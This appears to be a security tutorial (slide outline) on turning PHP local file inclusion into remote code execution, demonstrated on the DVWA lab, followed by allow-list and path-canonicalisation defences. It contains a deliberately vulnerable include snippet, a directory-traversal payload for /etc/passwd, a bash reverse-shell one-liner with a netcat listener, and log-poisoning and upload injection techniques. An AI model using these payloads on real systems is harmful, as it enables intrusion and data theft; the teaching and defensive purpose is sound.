Local File Inclusion to Remote Code Execution
- 2. Introduction
What is a file inclusion vulnerability?
How does the attack work?
RFI/LFI vulnerable PHP functions
Traverse and read local files
Path Traversal / FI using scanners
Reverse shell via LFI
Other ways to inject your code
Defending yourself
- 3. What is a file inclusion vulnerability?
Input validation: the application trusts the user input instead of validating it
The code includes/imports other pages
The page to include is chosen dynamically from user input
When PHP includes a file it parses and executes any PHP code within
that file (everything between "<?php" and "?>")
Do not trust the user... ever!
- 4. How does the attack work?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
The code would be:
<?php
$file = $_GET['page'];
include("/" . $file . ".php"); // <-- Vulnerable: the user controls the path
?>
Set page to "../../../../etc/passwd%00"
<?php
$file = $_GET['page'];
include("/../../../../etc/passwd\0.php"); // <-- Directory traversal to LFI
?>
%00 decodes to a NUL byte; the C library calls PHP used to open the file stop at the NUL, so the appended ".php" is dropped. This only works on PHP < 5.3.4 (later versions reject paths containing a NUL byte); if the code appends no suffix, the %00 is not needed at all.
../../../ walks up to the root directory, and from there etc/passwd is read. Extra ../ are harmless once at /, so pick a depth that is surely enough.
- 6. Common locations
Files commonly read through an LFI:
/etc/passwd
/etc/group
/etc/security/passwd (AIX)
/etc/security/user (AIX)
/etc/security/environ (AIX)
/etc/httpd/conf/httpd.conf
Other common Unix locations
- 7. Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
- 9. Reverse shell via LFI
PHP script to open an outbound TCP connection (place it where the LFI can include it)
<?php exec("bash -c 'bash -i >& /dev/tcp/<yourIP>/<port> 0>&1'"); ?>
exec() hands the command to /bin/sh; where that is dash rather than bash, the >& and /dev/tcp redirections fail, so the one-liner is wrapped in bash -c.
Go and catch the reverse shell, with the listener started on your machine first:
nc -lvp <port>
- 10. Other ways to inject your code
Using directory traversal to reach files outside the web root
Log poisoning (access.log, error.log): send PHP code in a logged field such as the User-Agent or the request path, then include the log file
Session variables: PHP session files (e.g. /tmp/sess_<id>) store values you control
Uploaded files: an image or document carrying PHP code is executed once included
Emails: mail delivered to a local user lands in /var/mail/<user>
Shared hosting: files of other tenants on the same server
FTP and other logs: any log that records a field you control
- 11. Defending yourself
<?php
// Allow-list: the user picks a key, never a path
$page_files = array(
    'about'   => 'about.html',
    'photos'  => 'photos.html',
    'contact' => 'contact.html',
    'home'    => 'home.html'
);
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
if (array_key_exists($page, $page_files)) {
    include $page_files[$page];
} else {
    include $page_files['home'];
}
?>
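The allow-list above is the preferred fix. When real file names must be accepted (a download directory, for instance), the same defensive idea generalises to canonicalising the path and checking that it stays under the base directory. The following is an added example in Python, not code from the slides; BASE is a hypothetical document directory, and naive_strip is included only to show why stripping "../" from the input is not a fix.

```python
# Added example, not from the slides. BASE is a hypothetical directory.
import os

BASE = "/var/www/site/pages"


def naive_strip(name):
    """A common but broken fix: delete '../' once. '....//' survives it."""
    return name.replace("../", "")


def safe_path(base, user_name):
    """Return the absolute path of `user_name` inside `base`, or None if it escapes.

    realpath() resolves '..' and symlinks, so the check is made on what the OS
    would actually open, not on the string the user sent. Absolute names,
    traversal, empty names and NUL bytes (the %00 trick) are all rejected."""
    if not isinstance(user_name, str) or "\x00" in user_name:
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_name))
    if not candidate.startswith(base_real + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    for name in ["about.html", "sub/page.html", "../../../etc/passwd",
                 "/etc/passwd", naive_strip("....//....//etc/passwd"),
                 "about.html\x00.php"]:
        print(repr(name), "->", safe_path(BASE, name))
```

Note that os.path.join discards base when the user name is absolute, which is why the prefix check, not the join, is what protects you; the trailing os.sep in the comparison stops "/var/www/site/pages-old" from passing as a child of "/var/www/site/pages".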